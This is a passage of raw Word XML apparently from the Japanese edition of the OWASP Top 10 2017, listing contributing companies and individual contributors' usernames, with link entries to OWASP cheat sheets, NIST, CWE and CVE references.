        <w:t xml:space="preserve">Osampa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Paladion Networks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Purpletalk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secure Network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shape Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SHCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Softtek</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Synopsis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TCS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vantage Point</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Veracode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">データコントリビュータの一覧は</w:t>
      </w:r>
      <w:hyperlink r:id="rId323">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">一般公開</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">されています。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="324"/>
    <w:bookmarkStart w:id="325" w:name="個人のコントリビュータへの謝辞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">個人のコントリビュータへの謝辞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GitHubにおいてTop 10に貢献するために多くの時間を費やした以下の個人のコントリビュータ及びTwitter、電子メール、その他の手段で貢献してくださった方々に感謝の意を表します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ak47gen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">alonergan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ameft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">anantshri</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bandrzej</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bchurchill</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">binarious</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bkimminich</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Boberski</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">borischen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Calico90</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">chrish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">clerkendweller</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D00gs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">davewichers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">drkknight</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">drwetter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dune73</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ecbftw</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">einsweniger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ekobrin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eoftedal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">frohoff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">fzipi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gebl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gilc83</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gilzow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">global4g</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">grnd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">h3xstream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hiralph</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HoLyVieR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ilatypov</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">irbishop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">itscooper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ivanr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jeremylong</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jhaddix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jmanico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">joaomatosf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jrmithdobbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jsteven</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jvehent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">katyanton</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kerberosmansour</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">koto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">m8urnett</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mwcoates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">neo00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nickthetait</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ninedter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ossie-git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PauloASilva</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PeterMosmans</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pontocom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">psiinon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pwntester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">raesene</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">riramar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ruroot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">securestep9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">securitybits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SPoint42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sreenathsasikumar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">starbuck3000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">stefanb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sumitagarwalusa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">taprootsec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tghosth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TheJambo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">thesp0nge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">toddgrotenhuis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">troymarshall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tsohlacol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vdbaan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1069"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">yohgaki</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dirk Wetter、Jim Manico、Osama Elnaggarhaveからは多大なる支援をしていただきました。また、Chris Frohoffand Gabriel Lawrenceは</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A8:2017-安全でないデシリアライゼーション</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">の執筆において貴重なサポートをしていただきました。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="325"/>
    <w:bookmarkEnd w:id="326"/>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03" Target="media/rId303.png" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId306" Target="media/rId30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43" Target="0xd1-data-contributors.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId199" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId248"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7"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58" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId204" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId140" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId205" Target="https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId225"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29"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64" Target="https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId139"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7" Target="https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId138"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162" Target="https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId194" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId258" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId238" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId196" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId195" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId179" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId144" Target="https://cwe.mitre.org/data/definitions/220.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId266" Target="https://cwe.mitre.org/data/definitions/223.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId180" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId181"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5" 